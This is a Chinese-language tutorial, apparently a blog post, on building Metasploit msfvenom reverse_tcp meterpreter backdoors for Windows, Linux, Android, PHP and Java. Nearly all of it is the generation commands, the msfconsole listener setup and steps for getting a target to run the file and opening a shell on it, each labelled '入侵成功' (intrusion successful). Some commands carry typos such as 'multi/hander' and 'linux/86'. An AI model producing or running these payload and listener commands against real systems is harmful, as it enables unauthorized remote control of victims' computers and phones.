操作系统
Windows
构造载荷
终端下输入命令msfvenom -p windows/meterpreter/reverse_tcp LHOST=本机IP LPORT=本地端口 -f filetype >filepath/filename
-p 值为构造的payload lhost 值为监听的ip lport 值为监听的端口 -f 值为生成的后门文件的类型 filepath 生成文件路径
在msfconsole设置监听
use exploit/multi/hander
进行相应配置
set payload windows/meterpreter/reverse_tcpset LHOST 本地IPset LPORT 本地端口exploit
目标机执行文件
msfconsole成功获得一个会话进入meterpreter
成功连接后门
输入shell进入目标机shell
Linux
构造载荷
终端下输入命令msfvenom -p linux/86/meterpreter/reverse_tcp LHOST=本机IP LPORT=本地端口 -f filetype >filepath/filename
-p 值为构造的payload lhost 值为监听的ip lport 值为监听的端口 -f 值为生成的后门文件的类型 filepath 生成文件路径 filename 生成文件名称
生成文件并赋予可执行的权限chmod 777 filename
将生成的文件复制到目标机中
msf开启监听
set payload linux/x86/meterpreter/reverse_tcp 及相应设置
目标机执行文件
msfconsole成功获得一个会话进入meterpreter
入侵成功
输入./filename 即可进入目标机shell
Android
构造载荷
终端下输入命令msfvenom -p android/meterpreter/reverse_tcp LHOST=本机IP LPORT=本地端口 R >filepath/filename.apk
-p 值为构造的payload lhost 值为监听的ip lport 值为监听的端口 filepath 生成文件路径 filename 生成文件名称
msf开启监听
set payload android/meterpreter/reverse_tcp 及相应设置
目标机执行文件(可下载一个手机模拟器)
msfconsole成功获得一个会话进入meterpreter
入侵成功
键入check_root ,查看权限
编程语言
PHP
构造载荷
终端下输入命令msfvenom -p php/meterpreter/reverse_tcp LHOST=本机IP LPORT=本地端口 -f raw >filepath/filename.php
-p 值为构造的payload lhost 值为监听的ip lport 值为监听的端口 filepath 生成文件路径 filename 生成文件名称
msf开启监听
set payload php/meterpreter/reverse_tcp 及相应设置
目标机执行文件
- windows下,需要搭建PHP环境,以浏览器方式打开
- kali Linux 开启apache2服务下
- 输入
php ./filename.php命令执行文件 - 搭建服务器,将文件放到根目录,以浏览器方式打开
- 输入
msfconsole成功获得一个会话进入meterpreter
入侵成功
键入shell即可进入目标机shell
Java
构造载荷
终端下输入命令msfvenom -p java/meterpreter/reverse_tcp LHOST=本机IP LPORT=本地端口 -o filepath/filename.jar
-p 值为构造的payload lhost 值为监听的ip lport 值为监听的端口 filepath 生成文件路径 filename 生成文件名称
msf开启监听
set payload java/meterpreter/reverse_tcp 及相应设置
目标机执行文件
- windows下,java环境安装的前提下,双击打开
- kali Linux
java -jar ./filename.jar
msfconsole成功获得一个会话进入meterpreter
入侵成功
键入shell即可进入目标机shell
作者:李尘
